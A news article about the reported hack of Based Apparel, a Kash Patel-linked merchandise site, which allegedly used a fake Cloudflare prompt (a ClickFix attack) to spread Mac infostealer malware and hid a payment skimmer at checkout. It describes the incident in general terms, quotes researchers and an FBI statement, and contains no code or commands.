Kash Patel-Linked Merchandise Site Goes Dark After Hack Allegedly Spread Malware to Visitors
A merchandise website linked to Kash Patel was taken offline Friday after reports emerged that hackers had compromised the platform and attempted to infect visitors’ devices with malware through a deceptive online prompt.
The site, Based Apparel, which sells “K$H”-branded merchandise tied to Patel, including patriotic clothing, books and accessories, reportedly went dark after cybersecurity concerns surfaced. Visitors on Friday were met with a message stating, “We’ll be right back,” while promising the online store would return “bolder than ever”.
The issue was first reported by Straight Arrow News, which said an X user identified as “debbie” flagged suspicious activity on the site after noticing signs of malware.
Debbie, who declined to be described as a cybersecurity expert and instead called herself a “big time nerd,” said the website appeared to be distributing an infostealer, malicious software designed to steal passwords, credentials and other sensitive information.
Fake Cloudflare Prompt to Spread Malware
As reported, visitors to the website encountered what looked like a legitimate Cloudflare verification page warning that their IP address had been flagged for “irregular web activity”.
Users were then instructed to copy and paste a code into their computer terminal, a tactic known as a ClickFix attack, often used in social engineering schemes.
However, the copied command allegedly contained hidden instructions that silently downloaded malware onto Mac devices, without users realizing it.
A security researcher known online as “WifiRumHam,” who analyzed the code, told Straight Arrow News the malware was designed to collect browser cookies, passwords, login credentials, Apple Notes data and information tied to more than 200 cryptocurrency browser extensions.
The researcher also claimed to have identified a payment skimmer embedded in the site’s checkout process that could potentially capture credit card details.
The publication reported the breach may have stemmed from a malicious WordPress plugin installed by attackers, though how access to the site was initially gained remains unclear.
However, the FBI said Patel had “divested from any interest” in Based Apparel before becoming FBI director and does not profit from its sales. The bureau declined to say whether it is investigating the incident at the moment of reporting.
It should be noted that this episode of cyber attack comes after an Iranian-linked hacker group reportedly leaked hundreds of emails from Patel’s private Gmail account, exposing personal documents and family photos in March. On its website, the hacker group Handala Hack Team claimed Patel had joined the list of victims it had successfully compromised.
